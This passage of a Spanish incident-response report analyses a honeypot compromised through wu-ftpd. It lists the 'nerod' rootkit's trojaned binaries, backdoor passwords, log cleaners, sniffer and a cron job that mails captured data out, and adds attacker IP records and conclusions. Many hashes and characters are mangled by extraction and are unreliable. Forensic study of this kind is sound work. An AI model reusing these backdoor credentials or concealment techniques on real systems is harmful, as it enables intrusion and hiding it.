/bin/cp f 97def d364f 96870e544ea6f 35a88bf 8

binario original, infectado por el RST.b virus
/bin/cpio d057e30942689af d6709667ef 53d37f f

binario original, infectado por el RST.b virus
/bin/dd ad57f e67aab271c189379e9647db4f 6b

binario original, infectado por el RST.b virus
/bin/df 5bd8d84153c532bb6cd6753a2896450a

binario original, infectado por el RST.b virus
/bin/ed 1e0c75b2cb4b04a24cb78f 1011af a5b6

binario original, infectado por el RST.b virus
/bin/hostname 2d608e6246213bb4e0af 7be1f 25a4f 21

binario original, infectado por el RST.b virus
/bin/ln 1bbb0f d3956bcc2e1258400ec1064a46

binario original, infectado por el RST.b virus
/bin/lnetstat 30286974e55bb9f 9e82f 93cc44c39492

Binario /bin/netstat original de RedHat 7.1, movido aqu por el script
/var/ftp/nerod/install
/bin/login 9288dac26e0aae060bc2bb036020b451

Instalado desde /var/ftp/nerod. Se trata de un 'backdoor' del login estndar que
permite la entrada en el sistema mediante el password escondido "satori", sea cual
sea el password real del usuario. Adicionalmente, emplear el usuario "rewt" da
acceso como "root".
Informe tcnico Reto de Anlisis Forense

Pg. 32
/bin/lps ac0b58050deb21db1ed701277521320b

Binario /bin/ls original de RedHat 7.1, movido aqu por el script /var/ftp/nerod/install
/bin/ls cf b7a44f 86a5e648f def 3367e2b6495b

Troyano del comando ls, esconde de su salida los ficheros cuyos nombres
contengan lo indicado en el fichero de configuracin /dev/ttyof. Instalado desde
/var/ftp/nerod/install y contaminado por el virus RST.b.
/bin/lsp dc1961b6ce3f f 6d6f e2c89c8603f 4985

Binario /bin/ls original de RedHat 7.1, movido aqu por el script /var/ftp/nerod/install
/ bin/ mail 030678939129ca2a1c0f b896f 61a597e

binario original, infectado por el RST.b virus
/bin/me d0a432ea2e4e9b462d29796da8eb7bcb

Instalado desde /var/ftp/nerod por el script de instalacin del rootkit, es un script
que nicamente contiene:

#!/bin/sh
unset HISTFILE
unset TMOUT
echo " cd /usr/man/man1/psybnc"
echo " open ftp.geocities.com"
/bin/mkdir abf 35510c59121810e5ca4bd51df 99f a

binario original, infectado por el RST.b virus
/bin/mknod 7c2def 7291b2c3ba89b9272bdf 2f b29d

binario original, infectado por el RST.b virus
/bin/mktemp 4a0a1da5160458609427e48eddc61960

binario original, infectado por el RST.b virus
/bin/mt 200a5dcf 77ebeb4890727c5d45cdaa14

binario original, infectado por el RST.b virus
/bin/mv 6f 839f 6be00c930ca0a4713df 57995d2

binario original, infectado por el RST.b virus
/bin/netstat 018f f 2c8b70dc7534eed16c846c756ec

Troyano del comando netstat, esconde de su salida las direcciones IP o nombres de
dominio indicadas en el fichero de configuracin /dev/ttyoa. Instalado por
/var/ftp/nerod/install y contaminado con el virus RST.b
/bin/ping 5eb2f cd4a86f 49a3f 24d2b624f c869c3

binario original, infectado por el RST.b virus
/ bin/ ps a71c756f 78583895af e7e03336686f 8b

Troyano del comando 'ps' estndar. Esconde de su salida todos los procesos
indicados en el fichero /dev/ttyop. El checksum md5 coincide con un fichero con el
que ya nos hemos encontrado en otro anlisis forense. En concreto, se trata del
mismo fichero instalado por un rootkit en la intrusin descrita en el reto de Honeynet
nmero 29. ( ver Uhttp://project.honeynet.org/scans/scan29/U)
/bin/setserial 365a33d2809406bf 304ad1a2347e9e7a

RST.b virus. setserial "seguro" traido por los administradores del honeypot


Informe tcnico Reto de Anlisis Forense

Pg. 33
/bin/shad 55955848943cbe9a0bc0f e3d14cba972

Programa para arrancar otros binarios escondiendo su autntico nombre,
cambiando el argv[0]. Uso: shad <nombre_ficticio><comando a ejecutar>
<parametros>. Instalado por el script de instalacin del rootkit bajo /var/tmp/nerod
/dev/hdx1 d41d8cd98f 00b204e9800998ecf 8427e
d41d8cd98f 00b204e9800998ecf 8427e

Estos dos ficheros vacos resultan de la ejecucin de un programa contaminado con
el virus RST.b. En concreto, el origen del mismo es /var/tmp/.,/httpd.
/dev/ttyoa 6b7b4d6270255ba973f 9865020490423

Contiene las conexiones de red a esconder de la salida del comando 'netstat'
troyano. El formato del fichero es el siguiente:
[ 1 =Esconder conexiones entrantes de esa direccin ]
[ 2 =Esconder conexiones salientes a esa direccin ]
[ 3 =Esconder conexiones entrantes a ese puerto ]
[ 4 =Esconder conexiones salientes a ese puerto ]
[ 5 =Esconder un socket UNIX (directorio) ]

/dev/ttyof 14aaf eab735548f 0d6c24cf b6e6803c0

Contiene la lista de ficheros a esconder (fichero de configuracin de los comandos
troyanos 'ls', 'du', 'find' y 'vdir')
/dev/ttyop 710657a7b9f 9f b864739f 57a71f 37ecc

Contiene la lista de procesos a esconder (fichero de configuracin de los comandos
troyanos 'ps', 'killall', 'top' y 'pstree')
/dev/ttyos 9da4ef c8df c18db52f 0f 39f dc1f 04f f 3

Contiene la lista de cadenas a esconder del sistema de log (fichero de
configuracin del syslogd troyano instalado)
/etc/ftp 67b48c5d64cf 856db41ae33636cf 748e

Fichero de texto, que nicamente contiene la cadena "ssh", aparentemente con la
intencin de impedir el acceso del usuario ssh via ftp
/etc/ftpusers 37022f 11e99ae50bba1e304d3f 82f ae5

Modificado por el hacker, para contener ssh, con la intencin de impedir el acceso
de este usuario via ftp.
/etc/group 61c6a6548763338d16ad210564b48f b4
21492de7c7058104cbf 337de42576765

Modificados para tener el usuario 'nerod'.
/etc/gshadow 74e7c4edf 1d9344c31bb85b686748d5b
78d7d99f 79928eb6c0239ee69ad7e4d3

Ficheros shadow del /etc/group.
/etc/passwd a74ac1c6c65c7c20f f 392ecf 62770d0d
aed586ed7f 875f ba47848814d58655f 6

Con respecto a un sistema 'limpio', hay 3 cuentas: pepelu (creada por el
administrador del sistema), ssh (creada por el script /var/tmp/nerod/install, sin
password) y nerod, creada en la intrusin. Adems, se ha eliminado la cuenta ftp.

Informe tcnico Reto de Anlisis Forense

Pg. 34
/etc/passwd.OLD 8a7e8058f 36133a8472634009c09b529

Copia del /etc/passwd, hecha por el administrador tras aadir el usuario pepelu.
/etc/rc.d/init.d/atd 5e13cb6e8a752921bae378ea9ccbb2ec

Fichero de arranque del demonio 'atd', instalado en /etc/rc.d/init.d/atd, que
adems de arrancar del demonio de 'at' tal y como hace el fichero estndar, se
asegura de arrancar todos los troyanos instalados con unas lneas de "inet_start all"
camufladas por enmedio. Esta funcin 'inet_start' est definida en el fichero
'functions', tambin modificado por el rootkit.
/etc/rc.d/init.d/functions 231835c85f 215a44f e2d48c9dc389457

Script modificado para definir la funcin 'inet_start' para arrancar los siguientes
troyanos: sshd y el sniffer bajo /usr/local/games/identd. Se copi al final del fichero
/etc/rc.d/init.d/functions estndar por el script de instalacin del rootkit. De esta
forma, y al ser tambin modificados /etc/rc.d/init.d/atd y /etc/rc.d/init.d/inet, se
asegura el arranque automtico de los mismos con el inicio del sistema.
/etc/rc.d/init.d/sshd b33deb29db1aed81866e048416b0bd68

Script de arranque del demonio sshd instalado desde /var/tmp/nerod/sshd; el script
'sshd-install' lo copia desde init.sshd. La diferencia fundamental con el script de
arranque estndar es que ste nunca intenta generar nuevas claves, con el objeto
de seguir siempre empleando las instaladas por el hacker.
/etc/rc.d/init.d/syslog 29056af 3f f 697f 3cf 5de07ef 3bc46814

Script de arranque del demonio syslogd, copiado desde /var/tmp/nerod
/ etc/ ssh/ ssh_host_key 4ef f c0e40601df 5c7ac6617c4f 41eb51

Clave privada de ssh, copiada desde /var/tmp/nerod/sshd. Interesante la cadena
root@xxxbuck.com.
/etc/ssh/sshd_config 57d92002e68514d8998ee64198bbe975

Fichero de configuracin de sshd, instalado por 'sshd-install' desde
/var/tmp/nerod/sshd. Configura al demonio para escuchar en el puerto 1981, en
lugar del estndar 22.
/etc/ssh_host_key 4ef f c0e40601df 5c7ac6617c4f 41eb51

Clave privada de ssh, copiada desde /var/tmp/nerod/sshd. Interesante la cadena
root@xxxbuck.com.
/etc/ssh_random_seed b2cbc7108a7f 5373961a84f d04f 67da8

Fichero semilla de ssh, copiado desde /var/tmp/nerod/sshd.
/etc/sshd_config 57d92002e68514d8998ee64198bbe975

Fichero de configuracin de sshd, instalado por 'sshd-install' desde
/var/tmp/nerod/sshd. Configura al demonio para escuchar en el puerto 1981, en
lugar del estndar 22.
/etc/xinetd.d/wu-ftpd 0291b392c300c7a92870320388205f 2a

Configurado por el administrador del sistema para habilitar wu-ftpd
/home/nerod/.bash_log
out
d19bbbed9d713f 97f 487b9ed9ec3f 62f
/home/nerod/.bash_prof
ile
4e864b291c787d826e6f c8daf 31c2f 83
/home/nerod/.bashrc b4bae87d7ae5dec79524bcd6eef b9acb
/home/nerod/.emacs 5b3d50b0ecc06f 0cc0071524d133acf 6
/home/nerod/.screenrc c17d319e7b9f f d7cde89e6f 65cf cf cac
Informe tcnico Reto de Anlisis Forense

Pg. 35

Ficheros estndar de configuracin RedHat7 para 'nerod'.

/ home/pepelu/ .bash_lo
gout
d19bbbed9d713f 97f 487b9ed9ec3f 62f
/ home/pepelu/ .bash_pr
ofile
4e864b291c787d826e6f c8daf 31c2f 83
/home/pepelu/.bashrc b4bae87d7ae5dec79524bcd6eef b9acb
/home/pepelu/.emacs 5b3d50b0ecc06f 0cc0071524d133acf 6
/home/pepelu/.screenrc c17d319e7b9f f d7cde89e6f 65cf cf cac

Ficheros estndar de configuracin RedHat7 para 'pepelu'.
/ root/ .bash_history 04ee52d8d06e83e650ca580294b807ea

Contiene una serie de comandos ejecutados por root, Hay varias partes bien
diferenciadas:
1- Configuracin de lilo y wu-ftpd, realizada por el administrador del sistema.
2- Actividad de intrusin, relacionada con la descarga y creacin de ficheros bajo
/root/.,
3- Actividad de intrusin, relacionada con actividad bajo /var/tmp/.,
Es interesante hacer notar que el fichero fue truncado por el administrador del
sistema para no dejar constancia de los comandos ejecutados por el para copiar
las imgenes de las particiones.
/root/.ncftp/firewall 1cbb57a19bdf 8db88a29a9219bcc2cc6

Fichero de configuracin de 'ncftp' para el usuario root. Ncftp fue usado por los
administradores del sistema para copiar ficheros.
/ sbin/ iportmap e47eb7a4d32ec4b80b29d4d238ef 4a8c

Binario /sbin/portmap original de RedHat 7.1, movido aqu por el script
/var/ftp/nerod/install
/ sbin/ syslogd 53f c8c03b327952f be891d4f 02a036b8

Syslogd troyano, forma parte del rootkit instalado desde /var/ftp/nerod. No enva al
log del sistema ninguna informacin con cadenas encontradas en /dev/ttyos
/usr/bin/chsh 71dcb1516635e8910a37444ecd95992f

Troyano del comando /usr/bin/chsh, est adems protegido contra el anlisis, al
capturar las llamadas a 'ptrace'. Se trata de un 'backdoor' que da acceso al sistema
como 'root' al introducir como nueva shell la palabra clave "satori". Este binario es
alguna variante del incluido en el rootkit lrk4, ver
Uhttp://project.honeynet.org/papers/enemy3/README.txtU. Instalado desde
/var/ftp/nerod
/usr/bin/clean f 9e2970e3a7682440316b6e1a2687cbe

Script para borrar todas las lneas conteniendo una cadena que se pase como
parmetro de todos los ficheros de log bajo /var/log, rearrancando el demonio
syslogd. Instalado por el script de instalacin 'install' del rootkit bajo /var/ftp/nerod
/usr/bin/dir 9e7165f 965254830d0525f da3168f d7d

Troyano del comando /bin/ls, esconde de su salida los ficheros cuyos nombres
contengan lo indicado en el fichero de configuracin /dev/ttyof. Se trata del mismo
fichero analizado en el reto de honeynet #29 (ver por ejemplo,
Uhttp://www.honeynet.org/scans/scan29/sol/gmartin/filelist.htmlU). Instalado desde
/var/ftp/nerod


Informe tcnico Reto de Anlisis Forense

Pg. 36
/usr/bin/du 12cc055bf 763b37f 9792b7bef 92cf 093

Troyano del comando /usr/bin/du, esconde de su salida los ficheros cuyos nombres
contengan lo indicado en el fichero de configuracin /dev/ttyof. Copiado desde
/var/ftp/nerod.
/usr/bin/find eb1c26da59b892570f 4567469d49bd8c

Troyano del comando /usr/bin/find, esconde de su salida los ficheros cuyos nombres
contengan lo indicado en el fichero de configuracin /dev/ttyof. Instalado desde
/var/ftp/nerod.
/ usr/ bin/ imp da4171d1b46b7792b79a53f c87457f e4

Herramienta de denegacin de servicio (DoS) mediante la tcnica de 'SYN
flooding', bombardea a un sistema objetivo con un alto nmero de peticiones de
conexin, consiguiendo de forma efectiva su paralizacin. Instalada desde
/var/ftp/nerod por el script de instalacin del rootkit. Conocida tambin como
'slice3' puede obtenerse enU http://packetstormsecurity.nl/DoS/indexdate.shtmlU
/usr/bin/killall 1678eb0817a0775f dadd24119e28d810

Troyano del comando /usr/bin/killall, ignora los procesos indicados en el fichero de
configuracin /dev/ttyop. Instalado desde /var/ftp/nerod.
/usr/bin/lfind 13838a254761739dc06b05663a5770b2

Binario /usr/bin/find original de RedHat 7.1, movido aqu por el script
/var/ftp/nerod/install
/usr/bin/ltop be854d9c69c40b22535323bf 29cbb20e

Binario /usr/bin/top original de RedHat 7.1, movido aqu por el script
/var/ftp/nerod/install
/usr/bin/pidof ed439d80889017f e5499c2e6e6448a24

Binario /usr/bin/killall original de RedHat 7.1, movido aqu por el script
/var/ftp/nerod/install
/usr/bin/rmold 61eaec2dc4b9466c6e67f d029eb03425

wget 1.5.3-1
/usr/bin/shad 55955848943cbe9a0bc0f e3d14cba972

Programa para arrancar otros binarios escondiendo su autntico nombre,
cambiando el argv[0]. Uso: shad <nombre_ficticio><comando a ejecutar>
<parametros>. Instalado por el script de instalacin del rootkit bajo /var/tmp/nerod
/usr/bin/top 58a7e5abe4b01923c619aca3431e13a8

Troyano del comando top, instalado desde el rootkit de /var/tmp/nerod/, esconde
de su salida los procesos indicados en el fichero de configuracin /dev/ttyop
/usr/bin/vdir bf b9788eaa2010ebad96be6aead8a600

Troyano del comando vdir, instalado desde /var/tmp/nerod, esconde de su salida
los ficheros cuyos nombres contengan lo indicado en el fichero de configuracin
/dev/ttyof.
/usr/bin/wp c4774db51553f 61c8aef b1bcc123a81c

Programa para limpiar los ficheros de log wtmp,utmp y lastlog. Copiado desde
/var/ftp/nerod
/usr/bin/xlogin 4368d13785a784d0a2f 857c725c83939

Binario /bin/login original de RedHat 7.1, movido aqu por el script
Informe tcnico Reto de Anlisis Forense

Pg. 37
/var/ftp/nerod/install
/usr/include/rpcsvc/du f 912f 7c86b79779261651055f 6a96b1d

Binario /usr/bin/du original de RedHat 7.1, movido aqu por el script
/var/ftp/nerod/install
/usr/include/rpcsvc/syslo
gd
9701beb6453b49d599ae42e6a99a93b8

Binario /sbin/syslogd original de RedHat 7.1, movido aqu por el script
/var/ftp/nerod/install
/usr/local/games/banne
r
464dc23cac477c43418eb8d3ef 087065

Script de perl para analizar la salida del sniffer LinSniffer, instalado desde
/var/ftp/nerod por el script de instalacin del rootkit. Se trata del mismo fichero
analizado en el reto de honeynet #29 (ver por ejemplo,
Uhttp://www.honeynet.org/scans/scan29/sol/gmartin/filelist.htmlU)
/usr/local/games/identd 10f 6663e2e867f 4d3f 628648d340e7be

Sniffer de red. Instalado desde /var/ftp/nerod por el script de instalacin del rootkit,
recoge el trfico de red y lo almacena en /usr/local/games/tcp.log
/usr/local/games/tcp.lo
g
4aee47f 4435329eda02b050f 54ad7b49

Resultado del sniffing anterior. Contiene nicamente unas conexiones ftp al sistema:
adsl-209-233-126-166.dsl.scrm01.pacbell.net =>192.168.3.8 [21]
----- [Timed Out]
proxyscan.undernet.org =>redhat71 [23]
9i
----- [Timed Out]
67.96.226.249 =>192.168.3.2 [21]
----- [Timed Out]
67.96.226.249 =>192.168.192.98 [21]
----- [Timed Out]
62.194.200.212 =>192.168.192.98 [21]
X
/usr/local/sbin/sshd d17e923542b202746b9b3dad26ed25e7

Se trata de un troyano de sshd, con una puerta trasera que permite el acceso al
sistema con el password cuyo md5 sea "54818b05d116eadc7f67517a3a6e4b33", instalada
desde /var/ftp/nerod.
/usr/sbin/atd 93002f 144f de901260f 4b4ebdce57630


backdoor de red. Se trata de una shell conectada al puerto 465 (smtps) haciendose
pasar por un servidor Sendmail: aparece el banner tpico de:
220 - localhost.localdomain SMTPS Sendmail 8.11.0/8.11.0; <fecha>.
Cualquier comando que se le introduzca produce un simulacro de error:
500 5.5.1 Command unrecognized: "<comando>"
Unicamente al introducir una palabra cuyo checksum md5 de como resultado
"855f314a4a3eebb6e1f9c3dae3a8ae31" (generado con un simple echo -n |
/usr/bin/md5sum) se abre automticamente una shell, de la que se ha eliminado el
history log.
Este binario se copia a desde /var/ftp/nerod/md5bd mediante el script de 'install'. Se
trata del mismo fichero descrito en
HUhttp://www.blockout.info/BkdoorRkTroj/Fredriktxt1.txtUH.

Informe tcnico Reto de Anlisis Forense

Pg. 38
/var/spool/cron/operato
r
be89bbc0370ac251540813355a1f d850

Fichero de configuracin de cron, para enviar el primero de cada mes el fichero
resultado de sniffing (/usr/local/games/tcp.log) junto con la configuracin de red
del sistema a la direccin de correo suntsfant2@yahoo.com". Modificado desde la
instalacin de /var/ftp/nerod

5.5. Resumen de la actividad IRC
A efectos de facilitar su comparacin, hemos agrupado en esta tabla
resumen la informacin sobre los proxies de IRC configurados en el
sistema:
/root/.,/psybnc /var/tmp/.,/psync /var/tmp/.,/emech
Versin
2.2.1 2.2.2BETA N/A
Puertos locales
3245
6869
1983
6669 N/A
Servidores IRC
mesa.az.us.undernet.org:66
67
eu.undernet.org:6667
mesa.az.us.undernet.org:66
67
stockholm.se.eu.undernet.o
rg:6667
15 servidores undernet
(los de por defecto)
Login
George / george adrian adrian
User
Sa lmi Sugi Pola Cu Whoisu
Tau Cu Tot Lamere /
^2^311,12Protected By
Pizda Lui Mata...
Gone 4 Everto another
space
Lost4Ever in Cyberspace
Password
`l0G'80... / idem. `Y14`k1I... 12-rY...
Nick
NeRoD / NeRoD a Lost4Ever
Canales
#hackeri
#half_bb
#help-me
#School-Help
#beton
#bag.pula.in.mata.cu.whoi
su.tau.cu.tot
#linuxvr
N/A #beius
#beton
Arranque
23 Ago 01:17:41 23 Ago 10:18:29 23 Ago 10:20:29
Ultimo
mensaje/acceso
23 Ago 01:17:41 23 Ago 15:31:48 23 Ago 15:00:00
(modificacin y cambio
de mech.session)
PID
7464 7956 7989
Conexiones
De la unidad 781 de swap:

01:18:47 George
(80.96.68.72)
03:19:41 george (misma IP)
09:29:17 George
(80.96.68.71)
09:37:23 george (misma IP)
Del fichero de log
(/ var/ .,/ psybnc/ log/ psybnc
.log):

10:22:19 Connect from
213.154.99.10. New user
adrian.
N/ A
Informe tcnico Reto de Anlisis Forense

Pg. 39

6. Direcciones IP implicadas
A continuacin se muestra la informacin de registro de algunas
direcciones IP implicadas en el ataque analizado.
En los casos en los que ha sido posible, se ha aadido informacin
obtenida de DShield (Uwww.dshield.orgU) y/o Google (Uwww.google.comU).


Direccin IP Razn de inters / Informacin de registro
218.146.115.18 Primera conexin FTP annima, Aug 22 08:17:24, registrada en
/var/log/secure.
Sin traduccin DNS.
Asociada a un ISP de Korea: Uwww.kornet.comU


Informacin
de registro:
* APNI C ( Asi a) : www. apni c. net
i net num: 218. 144. 0. 0 - 218. 159. 255. 255
net name: KORNET
descr : KOREA TELECOM
descr : Net wor k Management Cent er
count r y: KR

213.84.155.131 Conexin FTP annima, Aug 22 08:30:13, registrada en
/var/log/secure.
Traduccin DNS: 84-155-131.adsl.xs4all.nl
Asociada a un ISP de Holanda: Uwww.xs4all.netU


Informacin
de registro:
* RI PE ( Eur opa) : www. r i pe. net
i net num: 213. 84. 137. 0 - 213. 84. 159. 255
net name: XS4ALL- ADSL
descr : XS4ALL I nt er net BV
descr : ADSL St at i c I P number s
count r y: NL

210.83.207.251 Conexin FTP sin autentificarse (ni siquiera como annima), Aug 22
13:11:59, registrada en /var/log/secure.
Sin traduccin DNS.
Asociada a un ISP de China: china-netcom.com

Otros sitios en Internet han recibido escaneos de puertos desde esta
IP hacia el puerto de FTP (21), por lo que parece que se dispona de
un exploit para FTP con el que se pretenda acceder a numerosos
equipos:
Uhttp:/ / cert.uni-stuttgart.de/ archive/ intrusions/ 2002/ 08/ msg00260.html


Informacin
de registro:
* APNI C:
i net num: 210. 83. 207. 240 - 210. 83. 207. 255
net name: dal i an- guanganmen- cor p
count r y: cn
descr : dal i an ci t y
admi n- c: TC254- AP
t ech- c: TC254- AP

Informe tcnico Reto de Anlisis Forense

Pg. 40
Direccin IP Razn de inters / Informacin de registro
200.47.186.114 Conexiones FTP annimas, Aug 23 00:12:13 y 00:22:48, registradas en
/var/log/secure.
Sin traduccin DNS.
Asociada a un ISP de Per: Uwww.comsat.com.peU.

Esta es la direccin IP desde la que el atacante logr acceso como
root al sistema.


Informacin
de registro:
* LACNI C ( Lat i noamr i ca y Car i be) : www. l acni c. net
i net num: 200. 47. 186/ 24
st at us: r eal l ocat ed
owner : COMSAT Per u S. A. - LMGT
owner i d: PE- CPSL1- LACNI C
r esponsi bl e: Oper aci ones COMSAT
addr ess: Mar t i r Ol aya, 129, Mi r af l or es
addr ess: 18 - Li ma - LI
count r y: PE
195.116.20.232 Conexin SSH, Aug 22 08:17:24, registrada en / var/ log/ secure.
Sin traduccin DNS.
Asociada a un ISP de Polonia: Uwww.telekomunikacja.plU.

Como curiosidad, existen en Google informes que reflejan que se
accedi desde esta IP a "Uhttp://www.sdf.se/~jocke/U".


Informacin
de registro:
* RI PE:
i net num: 195. 116. 0. 0 - 195. 117. 255. 255
net name: PL- TPSA- 960123
descr : PROVI DER
descr : TP S. A. Cent r umSyst emow
Tel ei nf or mat ycznych
count r y: PL

213.154.99.10 Conexin al psybnc de /var/.,/psybnc como usuario adrian.
Traduccin DNS: unasigned-reverse-213.154.99.10.pcnet.ro
Asociada a un ISP de Rumana: Uwww.pcnet.roU


Informacin
de registro:
* RI PE:

i net num: 213. 154. 96. 0 - 213. 154. 127. 255
net name: PCNET
descr : PCNET Dat a Net wor k S. A.
descr : PROVI DER ADSL Net wor k
count r y: RO

80.96.68.72 y 71 Conexiones del psybnc de /root/.,/psybnc como usuario George y
george
Traducciones DNS: 80-96-68-72.rdsnet.ro y 80-96-68-71.rdsnet.ro.
Asociada a un ISP de Rumana: Uwww.rdsnet.roU


Informacin
de registro:
* RI PE:

i net num: 80. 96. 68. 64 - 80. 96. 68. 79
net name: SC- ADO- NET- SRL
descr : SC Ado Net SRL
descr : st r . Andr ei Mur esan, nr . 2
descr : Campi a Tur zi i , Cl uj
count r y: r o

Informe tcnico Reto de Anlisis Forense

Pg. 41

7. Conclusiones
Las siguientes conclusiones pueden ser extradas de la investigacin de
este incidente.

7.1. Conclusin 1
El incidente se puede resumir en los siguientes hechos:
Un atacante logr acceso como root al sistema explotando la
vulnerabilidad CVE-2001-0550 (wu-ftpd glob) del demonio
servidor de FTP "wu-ftpd".
A continuacin instal y ejecut parcialmente un paquete de
programas denominado "nerod.tgz". Este grupo de programas
constituan un "rootkit", destinado a la apertura de puertas
traseras y la ocultacin de las actividades del intruso.
Despus accedi al sistema utilizando una de sus puertas
traseras, cerr el camino a otros atacantes que intentaran
explotar la misma vulnerabilidad, e instal dos paquetes de
programas bajo "/root/.,": psybnc y awu. El primero es un
conocido proxy de IRC que permite realizar conexiones IRC de
forma annima y el segundo es un conjunto de programas que
permiten el ataque automtico a multitud de sistemas con la
vulnerabilidad de wu-ftpd.
Finalmente, en una nueva conexin mediante una de sus puertas
traseras, el intruso descarg e instal dos nuevos paquetes de
programas, esta vez bajo "/var/.,": psybnc (una versin ms
reciente) y emech (manu.tgz). El primero es otra versin del
programa ya comentado, y el segundo es un cliente automtico
de IRC (IRC bot).
En paralelo, se registr cierta actividad de los proxies IRC
instalados por el atacante.

7.2. Conclusin 2
Los ataques son frecuentes, mucho ms frecuentes de lo que
comnmente se piensa. Y muchos de ellos son exitosos. Y muchos de
esos ataques exitosos pasan desapercibidos.
Esta conclusin se apoya en los siguientes hechos:
No transcurrieron ni veinticuatro horas desde que se conect el
sistema a la red hasta que recibi el primer escaneo.
El sistema fue retirado de la red, o al menos se hicieron las copias
Informe tcnico Reto de Anlisis Forense

Pg. 42
de sus particiones que han sido analizadas, el mismo da en que
el intruso logr vulnerar el sistema. En este caso el sistema estaba
seguramente bajo un escrutinio muy minucioso, dado que su
objetivo desde el momento de la instalacin era probablemente
el de servir de vctima para poder convocar este reto forense.
Pero en la vida real, la mayora de los sistemas no estn vigilados
tan de cerca. Cunto tiempo habra pasado hasta que un
administrador hubiese notado "algo extrao" en el sistema si no se
hubiera tratado de una mquina trampa (honeypot)?

7.3. Conclusin 3
Un anlisis forense de un sistema proporciona una enorme cantidad de
informacin sobre las actividades realizadas en ese sistema, y puede
aportar mucho (en algunos casos "todo") a la investigacin de un posible
incidente.

7.4. Conclusin 4
Preservar la evidencia es crucial para cualquier investigacin forense.
En incidentes informticos, como en incidentes de la vida real, la
preservacin de la evidencia juega un papel fundamental en el proceso
para asegurar el xito de la investigacin. En este incidente, mucha de
la informacin ha sido posible obtenerla porque se dispona de
imgenes binarias de las particiones del sistema de un instante de
tiempo cercano al incidente y sin demasiadas modificaciones inducidas
por el propio administrador del sistema. Si el administrador, cuando entr
en el sistema para generar las copias, hubiera empezado a lanzar
comandos para "investigar", muchas de las pruebas habran
desaparecido. Vase, por ejemplo, que el simple hecho de ejecutar el
comando "ls", al estar ste infectado por el virus RST.b, provoc que se
reinfectaran muchos comandos bajo /usr/bin, modificando sus fechas
de modificacin, haciendo ms difcil determinar la fecha y hora de su
infeccin inicial.
No modificar en absoluto la evidencia no es posible en la mayora de los
casos, pero siempre se debe intentar que la modificacin sea la menor
posible.


Informe tcnico Reto de Anlisis Forense

Pg. 43
8. Referencias

[1] Vmware workstation software. Uhttp://www.vmware.comU
[2] Autopsy Forensics Browser. HUhttp://www.sleuthkit.org/autopsy/index.phpUH.
[3] The Sleuth Kit. HUhttp://www.sleuthkit.org/sleuthkit/index.phpUH
[4] The Coroners Toolkit (TCT). HUhttp://www.porcupine.org/forensics/tct.htmlUH
[5] CERTP

P Advisory CA-2001-33 Multiple Vulnerabilities in WU-FTPD.


Descrito en HUhttp://www.cert.org/advisories/CA-2001-33.htmlUH.
[6] The Honeynet project. Uhttp://www.honeynet.org U
[7] Corelabs Vulnerability Report For WU-FTPD Server. Disponible en
HUhttp://www1.corest.com/common/showdoc.php?idx=172&idxseccion=10UH
[8] RedHat 7.X security advisories, disponibles bajo
HUhttp://www.redhat.com/support/errata/rh7-errata-security.htmlUHU.U
[9] RedHat Linux. HUhttp://www.redhat.com/UHU.U
[10] Google. HUhttp://www.google.com/UHU.U
[11] EnergyMech IRCbot. HUhttp://www.energymech.netUH
[12] Qualys Security Alert QSA-2002-01-01 "Remote Shell Trojan b"
(RST.b). HUhttp://www.securityfocus.com/archive/75/249346UH
HUhttp://www.securityfocus.com/archive/100/247640UH
HUhttp://www.virusbtn.com/magazine/archives/pdf/2002/200202.PDFUH
[13] Distributed Intrusion Detection System, HUhttp://www.dshield.org/UH



Informe tcnico Reto de Anlisis Forense

Pg. 44
9. Anexos
9.1. Mail enviado en instalacin de
nerod
A continuacin se muestra el contenido de los ficheros temporales de sendmail con la
informacin de cabecera y el cuerpo del mensaje, respectivamente, de un mensaje de
correo electrnico enviado por la instalacin del rootkit nerod.

Ambos ficheros fueron recuperados de la zona de espacio en disco libre de la particin
/var del sistema analizado, usando Autopsy:

Cont ent s Of Fi l e: / var / spool / mqueue/ t f g7MMQ5J 07358

V4
T1030055165
K0
N0
P34397
I 3/ 7/ 38170
Fb
$_r oot @l ocal host
Sr oot
Ar oot @l ocal host . l ocal domai n
RPFD: f r umosu99us@yahoo. com
H?P?Ret ur n- Pat h: <^129g>
H??Recei ved: ( f r omr oot @l ocal host )
by l ocal host . l ocal domai n ( 8. 11. 2/ 8. 11. 2) i d g7MMQ5J 07358
f or f r umosu99us@yahoo. com; Fr i , 23 Aug 2002 00: 26: 05 +0200
H?D?Dat e: Fr i , 23 Aug 2002 00: 26: 05 +0200
H?F?Fr om: r oot <r oot >
H?x?Ful l - Name: r oot
H?M?Message- I d: <200208222226. g7MMQ5J 07358@l ocal host . l ocal domai n>
H??To: f r umosu99us@yahoo. com
H??Subj ect : r 00t l a 80





Cont ent s Of Fi l e: / var / spool / mqueue/ df g7MMQ5J 07358



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Net wor k i nf o:

Host name : l ocal host . l ocal domai n ( 192. 168. 3. 10)
Al t er nat i ve I P : 127. 0. 0. 1
Host : l ocal host . l ocal domai n
Di st r o: Red Hat Li nux r el ease 7. 1 ( Seawol f )
Uname - a
Li nux l ocal host . l ocal domai n 2. 4. 2- 2 #1 Sun Apr 8 19: 37: 14 EDT 2001 i 586 unknown
Upt i me
12: 25am up 1 day, 5: 24, 0 user s, l oad aver age: 0. 60, 0. 16, 0. 05
Pwd
/ var / f t p/ ner od
I D
ui d=0( r oot ) gi d=0( r oot ) gr oups=50( f t p)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Yahoo. compi ng:
Informe tcnico Reto de Anlisis Forense

Pg. 45

PI NG 216. 115. 108. 243 ( 216. 115. 108. 243) f r om192. 168. 3. 10 : 56( 84) byt es of dat a.

- - - 216. 115. 108. 243 pi ng st at i st i cs - - -
6 packet s t r ansmi t t ed, 0 packet s r ecei ved, 100%packet l oss
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Hw i nf o:

CPU Speed: 166. 196MHz
CPU Vendor : vendor _i d : Genui neI nt el
CPU Model : model name : Pent i um75 - 200
RAM: 48 Mb
HDD( s) :
Fi l esyst em Type Si ze Used Avai l Use%Mount ed on
/ dev/ hda8 ext 2 251M 52M 185M 22%/
/ dev/ hda1 ext 2 53M 3. 4M 47M 7%/ boot
/ dev/ hda6 ext 2 1. 5G 44k 1. 4G 1%/ home
/ dev/ hda5 ext 2 1. 5G 479M 1023M 32%/ usr
